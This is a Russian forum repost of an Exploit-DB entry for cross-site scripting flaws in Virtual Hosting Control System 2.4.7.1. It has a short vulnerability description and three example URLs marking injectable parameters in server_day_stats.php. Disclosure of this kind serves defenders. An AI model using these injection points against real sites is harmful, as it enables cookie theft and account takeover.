Exploit Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27799
Проверка EDB
  1. Пройдено
Автор
O.U.T.L.A.W
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2174
Дата публикации
2006-05-02
Код:
source: https://www.securityfocus.com/bid/17790/info

Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/admin/server_day_stats.php?year=2006&month=05&day=2[xss]
http://www.example.com/admin/server_day_stats.php?year=2006&month=05[xss]&day=2
http://www.example.com/admin/server_day_stats.php?year=2006[xss]&month=05&day=2
 
Источник
www.exploit-db.com

Похожие темы